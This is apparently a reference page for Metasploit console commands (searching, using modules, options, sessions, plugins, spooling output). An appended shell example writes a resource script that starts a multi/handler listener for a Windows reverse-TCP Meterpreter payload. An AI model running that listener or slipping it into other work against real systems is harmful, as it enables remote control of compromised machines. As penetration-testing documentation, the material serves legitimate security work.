
core_commands

List of commands

help

To get more specific help about a command we can do:

help <command>

Other core commands are:

banner # prints the metasploit banner, nothing more
cd
pwd
color # enables/disables colorized output
history
grep # filters the output of another console command, like the Unix grep
irb # drops into an interactive Ruby shell with access to the framework
save # saves the current datastore (global and module options) to the msf config file
route # adds/removes routes so traffic to a subnetwork goes through an existing session (pivoting)
threads # shows the background threads of metasploit
version # prints the framework and console version
quit # quits metasploit
run # runs the selected module; exploit does the same for exploit modules
connect 192.168.1.3 4444
# a low-level TCP connection that works like netcat: something must
# already be listening on the given IP address and port

We can get the value of global variables with getg.

Searching Exploits

search type:exploit cve:2017 platform:windows
search type:exploit firefox

We can also list every exploit or payload, but this is rarely useful: a filtered search is almost always better.

show exploits
# or
show payloads

Using Modules

Once we have found the module (exploit/auxiliary/...) we want to use we do:

use exploit/firefox/local/exec_shellcode

From now on every variable we set lives in the context of the selected module.

We can list the variables (also called options) with:

show options

We can set/read options with set/get:

set SESSION 1
get SESSION

We can also set/read global options with setg/getg (a global option is inherited by every module that does not set its own value). We can unset variables with unset/unsetg:

unset SESSION
unsetg RHOST # if the variable is global

We can leave the module context by issuing:

back

Sessions

A session is an established connection with a remote machine, either a plain shell or a meterpreter session. To list the available sessions (the -i option interacts with one of them) we can do:

sessions
sessions -k 1
# kills the session with id 1
sessions -K
# kills all the sessions

Plugins

We can load additional plugins with the load command, for example:

load nessus
# loads the nessus plugin

We can query this plugin now with

help nessus

We can unload a plugin with:

unload nessus

Saving Metasploit Output

spool /tmp/spooling
search cve:2017 platform:windows
spool off

Everything printed to the console between the two spool commands, including the search results, is written to /tmp/spooling.
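The module workflow above (setg, use, set, show options, run/exploit, back) and the spool section both map directly onto a msfconsole resource script, a file of console commands that msfconsole replays with -r. The following shell snippet is an added example, not code from the original page or from the Metasploit project: it generates such a script and checks its contents; it does not start msfconsole, and the listener address 10.0.0.5, port 4444 and the file paths are placeholder assumptions. It uses the well-known exploit/multi/handler module and the windows/meterpreter/reverse_tcp payload, which are not the modules mentioned on this page.

```shell
#!/bin/sh
# Added example (not from the original page): build a msfconsole resource
# script (.rc) that batches the setg/use/set/exploit workflow from the notes
# and wraps the whole run in spool so the output lands in a log file.
# msfconsole is NOT invoked here; replay the generated file with:
#   msfconsole -q -r /tmp/handler.rc
# Assumed placeholders: LHOST 10.0.0.5, LPORT 4444, /tmp paths.

# write_rc OUTFILE LHOST LPORT SPOOLFILE
# Writes the resource script. LHOST is set globally with setg so any module
# selected afterwards inherits it; LPORT is set only for the handler module.
# "exploit -j" runs the handler as a background job so the console stays usable.
write_rc() {
    out="$1"; lhost="$2"; lport="$3"; spool="$4"
cat > "$out" <<EOF
spool $spool
setg LHOST $lhost
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT $lport
show options
exploit -j
sessions
back
spool off
EOF
}

# count_directives FILE DIRECTIVE
# Returns how many lines of the script start with DIRECTIVE followed by a space,
# handy for sanity-checking a generated script before handing it to msfconsole.
count_directives() {
    grep -c "^$2 " "$1"
}

write_rc /tmp/handler.rc 10.0.0.5 4444 /tmp/handler.log
cat /tmp/handler.rc
```

Because the first line is spool and the last is spool off, the whole batch (module options, job start, session list) is captured in /tmp/handler.log, which is the spool behaviour described above applied to a scripted run instead of an interactive one.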